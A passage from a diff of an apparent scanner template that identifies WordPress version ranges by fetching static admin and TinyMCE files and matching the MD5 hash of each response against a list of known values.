+ name: 4.0 - 4.0.32 + dsl: + - "(\"64fab611a72d919d3f73c771ef15445e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e3f82f1cef1efcf97ce21ec854195081\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"29af1d5f15655bad729af42e58aca3f2\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c2c48681543e79a94bb97052b2515b8e\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"916c9db27339c1ca756653466e82cb9c\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"1cde26c3ff2b26db1728fa937ca3cf2c\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"e4097e9dea685c3e613e0fc015ba2832\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"2609026f9412e8040a9b968ac127a1aa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"af1d6c3eb0ea441600d4a7f2ac4c7c4e\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"67730ca56853b59e34256a21239276ba\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a7a21c718bcad2219b689aff5f3069ce\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"93a84034566188cba3829bf2c5f086e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"619e58942a49b70e1490e19deab325f6\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"d40869ecf7e2a8f99bf2ec2d69f6e0b5\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"206c000a3d0c598ec471af58684f43e1\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"34a3ec49d6414125c613e87f9a51cf20\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7baba5f606cab24916f7802fd55f2d12\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"25d989447d4cc2930eddf46626aea1d3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"359d13f4402b1f1d7262e891a46aa636\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"eead944332db05e2cdde148dac2cdabe\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bc3602ceb3e5a0f05391eb77f48e3155\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e313328820b62adfcf516062ab6567b4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c05d582d250523e033d471c335f32381\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1db4cfab7e31dd1f8b3f168e83fc4eb8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9100940268231265441eeec70eaad488\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"617d9fd858e117c7d1d087be168b5643\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"da36bc2dfcb13350c799b62de68dfa4b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8ac9f2b666eaa82f047005ba79834f95\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"ed68f9b2b0bc3518687aeb93d4d53950\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ad995d60abf1b0d82d04f731122eed20\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"33510e09fd219d40e18f7fd9a7540d08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"9c9f28632838146ea5b1f9de9ac289c8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"654ac0a0f7a8fe1cd84c0c945b70af0f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8d0d5ced4b04e74ebc2d0d330076e9b9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"271de0780b4ce277539b2029932acd9c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fc3897e410c67fa0f71e13e0fedc0f0c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"2a0fc0a9434d3aa6abfda715dfe80ca2\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"93340ac2d020159c171ae87c9d0a941b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a8124966cbc8794feb6b9fa52b3b9e76\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"806e003025b3092f2f9eb3026c6d9d38\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"04328c1f971f271dc3618a71a0eee27d\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"2120500e18667adf1d9d5204b08879da\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"39eb6cb46f5071727c143ba407b54b53\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"ef923f64828b48c0c6f03a0e42d780b2\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ab9e254c14787712db65e61d2be6bef7\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"e2c347529384aff550838b13367792a6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3382df7e6ea38b249a7c9e71c72a56e0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"91030e73958b4b1f38ba18dcc85e478d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"3a0184e0737960ae80af99115327cdb5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"fb9481431bd943229c998da48760401d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"76d54c1d7bb4bfbca21d7cec56708a88\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"266c2a68e3ef53c32e87cb86c5167105\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dda20db0fea7db4eecf55cbcb7aeadda\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"de4f642413c45617556688cb66f92878\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6ee14a47645d8869019f211aac8fb097\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1af620877ea34337ec3a558b1f504c2a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"36cbcbb2f625bb726dfccd3f5b47f253\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"eae90901cd1d4841b2c9df2c26b0a8f7\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"73f3d17b335427a254e49fcddc51149c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"e608364cb27dcf58e94433c8c3f02518\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"8bdcfc3e4a5a6d512e326df5947cf442\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"b8b5f897d9f7a0a3202d16da58fa8567\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"8f66eb91bd871ee5a1b4e03ba3c18e84\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3f4eb897c1d10baf088c14dfc1808a22\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d31c9c63282d58d5a4261f6b7a249f78\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"5b3e602359d9f830634371082916a862\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7d522c5a28db08bc68c0a215899010a7\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"b8d0d2f9218cfb35658d15d11715ca6c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"dee21a1f544d4781bece558fb6a34ce8\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"b46b7cbc7a3548d8bb28a9ae0b08ed9d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1453c4441307c2cc637c67710b527e7f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"0f1c45aeab591060112ce9ff3f7f4ace\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.1 + dsl: + - "(\"61b5d1b6099e3e36cc2f73e400cf349c\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"00d304cfb272ef4addbbcb4812c73f98\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"4afced1f9ab8700e47f31367be6fe7f5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.5 + dsl: + - "(\"9a65c6f6979ef70401b0b919b02e83ec\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"8d578828e03173241c2f2981a78e8d76\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"c402c0d9c448c922371f09f5e8c5acc6\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.9 + dsl: + - "(\"73b51b5aa71eb16b933a02283e871064\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.2 + dsl: + - "(\"3693e7d995a7dfbcc6ed8f89aac15f9c\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"0d7894abf7d8addd7139fd53e7d51899\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"5039db87abba4481d89e74ec591a761d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"0f5e81397f59120b9f53ae708251a7f0\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"b0b7e2fa90ea37cd9de0489d978d56e2\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.11 + dsl: + - "(\"30d7bde04e460530a72425ee649a16d5\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"dcb6abd9b5957b73706088680f9151d9\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"6f2e2cba06ccf7e1106d1de79b66ae8b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ba2e2243e1870cd1623ed1de4bf95ccb\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"57fc7a21d1df2c4cbc4fb06dd43bdcc6\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"eaf98980a6aa955c848ea2a4688ee878\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"573ccd13990bffbf99e2273deb5b50dd\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.7 + dsl: + - "(\"a2995d1a4e10bf66e1d0a36b6b449424\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"69dd2736db6e8634bbe44998046c1ec9\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"587d485725001ad69b66564ad7f92067\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9fe35a0b1b7b33a545272a5c8d3710b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wordpress.css" + matchers: + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7097362cbcf848901a3b2b4403727b74\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"022939487eda7816036ece64e3cc176f\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"de8865129c6b495bd7472a1a2ba96808\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"225b39da6816d0a7a7f1549ec128dff4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"aa4cb8f641f50e9d33fa6213b7fe7bc9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"72e8801cc89a0b98141fc2dee9b873c6\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"d3cc587676f09f7e6ae73e6c8e7137b7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ab6285553bc272a086b545590d80cc22\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ea3b8db0abda3026ddbd397d7d8adc84\" == md5(body))" + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"7d6811856205875c098621001f4f698f\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"636fbecad6d5bd4bb3e4311c3a272877\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global-rtl.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"e62b1a3cc3693dfb1dbc9f3c99ee3ee2\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"615061f4d085863ef4eaf0b89eccb59c\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"1cd613c5e84869f94e5cb5d44f0493ec\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0005cc03539e4c0be4bdbc8cf12ba22d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"639432085f54f73cc7857d5e6b3fdb22\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9079a3999a5f5d3d9114380cb0d6628d\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"31b484efa9c7aeaeda48c8dd305ed455\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"9dcfffe3f2b12122ab451bc0c48df2ae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin.dev.css" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"af5f37a886c348054b2fb21bb2c70c7c\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"5c6176761fc0ee644e210b33ba20357f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d83a0ec5116bd51468027455caf3c36d\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"c8b8a4d72181369d2714002093e91c48\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"e55e5834423d22b753bc5f27fd90ba4a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f242d39c06919885462ee55861b9a859\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d11b980a3db81f466f9129a9a642c2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"4be2481e0d8960e317486394c2e5186f\" == md5(body))" + - type: dsl + name: 3.4.1 + dsl: + - "(\"f518a6c4b341dcad34ca7f5145485923\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"170885b4ee7eb66ed4220332d4b3e370\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"06dd9aaea22ad8c13722470196c5aab4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"92b1d910730c03ead0d0113d7cd01fbb\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"f77e30fb3963f31a628ad369fc71ad37\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"a6d4e8c9cf807f9aa705a886020d93f6\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"c68975fa2fc16fd96051530fb230668c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"030caf3660328d0bb366809887d33a2a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"081731ce01b46738e7adef8298ce8317\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4c2bbf4f1b085d161cd0b9ec95d962a5\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"f702228e2b2b7d81ea2d68bcf94b94da\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4fcf0cc06914368854e8d3956d67701d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"c1c470fd221acba9da73357892b3fed0\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"dc555dec7552e1b6da150c8ffeba9d72\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"990c061c85fc81736b9c6befac3b5c77\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"738cb6605cfba84eb49b8e5fe88e897f\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"f9c6007ccbff118e5f77a60127c9121c\" == md5(body))" + - type: dsl + name: 4.9 - 5.1.8 + dsl: + - "(\"9ff8672a8c72aecf01e6efa72daf2458\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"47835135274559ad6fe230b67dc65fc7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a86bc93cbddb1a2b44fb30a46f66a8ad\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"164c87f2a9052670f8342f871a4fadaf\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3beeca0b321ae3e5e4502bbb6553808f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"26942f6cfb2da2970477af44cd17938f\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d4656da83c9bd1b862f7e067b50cefed\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f146885900f710c867cd48f030851e97\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"dfb747b363e0d019c519b7a8bada6efc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"143f424d05b81aafe90c22c8f757f53a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"43fff36c3953279f711afdf374644dbd\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"17aae68019209c421bfa960a427905e2\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"47052b31a7383be79e9c16ea0d12bead\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9202d951edc7a3584b9f90263e11f848\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"88e9ab4f522932e1726bddd3b9f6b0e7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a16fb470df8691314021ea5e1535bf4e\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"fa1da7e900dbf5d150ddf026932c8cea\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"16321544efb636c26f9578140bbebb33\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"eaaffde6b37f2fb30f3b145f5f57456d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"7ec70092bf4310607125f6817678fd81\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"886e4191f990f81168d9d9e7c842ca6a\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"b4c57417333b659979469a7c496d5da2\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"1c73f84ad8fd0062cc75aab6c925d8c2\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"73b84824902a6efc5d892277c4dba147\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"d14c437109488e390fc93c58296bfe6a\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"89a31ff1d9f17d001504866e9a20eebd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"300482d04f7035050c8221a2388fa20b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a082154a8dde56295f325f37ccea73b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"5960f69e0ed72d7a00e9bceaa55c9901\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"783d7663a8f6d63af0f1502d604e0883\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"273623256ba39ea22d7706e94fa7a706\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"8f78f0b82394df926411c9792070e6b8\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"2790a6d6a5f4ea3a417ba3223c8992e0\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"381abc41a9cbc190de2ef74a2e393b06\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e406fa32c549ac964de8735631008aeb\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"9749243b24b6b8a96b3661f6af94577d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"71b5cb01bf11fbaea25876fb7226d560\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"96949ed7e435e3134e76a76c6c3a80d7\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"a91497ffc613caca5993b2f26d57fd95\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"f42ee6c5e96683c1aabf77c479a07457\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"d36964cc0fb79c59bfbbcdab333155cb\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d71af8e409639e4fe29a82b2583e97ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"74bbd59ce4185f4b61f493f25badfb85\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"eee93d5b9b96842ce7aa67ba2c1c1acd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"02f855357080d85d6d2f74e1358f198f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"928b4ce8221ec290c1b8f8cf863783a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dd6a35718c9902530d588cdaee69e8ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.1 + dsl: + - "(\"09a85c3689413e0ae8c2c36c71cb18b8\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"2db90f4a6e2b24a6ce1dc7cf5a4e665d\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"006614e9b8bc45c0c876a438ba68924b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.5 + dsl: + - "(\"5bd6d9dcdfa64309a4f474e3c103c87d\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"da6af7852e021c05095cfba81d84c3df\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"ec62f800c56ed23f98f1fce2f3d72e00\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.9 + dsl: + - "(\"3a3f7240ce8e984494c7f0038465b840\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.2 + dsl: + - "(\"c45c771577fb74eb5ee89ccfa8568554\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"ea8c761e49d51c34f97a568827466f50\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"809bc21a5b35c1e60d107c830bff9474\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"dc7c82e98849fd4bfac3646dd2adb837\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"b2caced58fa8561c815adf6ec2de1093\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.11 + dsl: + - "(\"1cfe476c543e87f1bf2ad3ac091dc920\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"03d191b53b73ee6f989291dfa7a97050\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"4e3f972530a74ecdd1cb522418db3cb3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9bd4ce60a27b57efbabe5569270c770b\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"bd119f2c6e5eaca98303aedbd95d067f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"c72fe4f61b17d1730183c6c5d3086faa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"60cff85a34f1cf5ad273abe018e82252\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.7 + dsl: + - "(\"13a70cb0ee2bc1c745056c543f394b54\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"5691e4edf58967ac68ef2a739339159d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a057a76f743909bce2a9e2f43b888e22\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f7ac80df36bf6cb0554f61441bf6519d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"1c8675dcd035cfb374f67bfcbf117a8c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2ec8b32828bdd9f0d9efeff41bfe801e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"4bd8e57afec65d9648c6f3c2e9a9d3ab\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"5e28120ca92eab35105b7e939fca9330\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"c4a2322a9fd0b704a2c78e090d402011\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"c6f9330320b00237858bc6422a49aaf8\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"3c05b86e8eff05cd86141aeab299d69f\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"78783e24b2fd8857004c9c7a179896be\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"6adead36e8e401d6a079f15a564a1b09\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2e6be97ee352add00ecf8f7d20174fc8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"385f34c03f7abf693be8551979ea9106\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.css" + matchers: + - type: dsl + name: 4.3 - 5.1.8 + dsl: + - "(\"74f9dcf5ab8c92f6666ff52c699873c8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7fbe22c3651b774033fa758ca07ccbbb\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"a3107b7ddafb2dad47ab68d596d8617d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f614179d0c40cd3dea9a0b89426e70a5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - 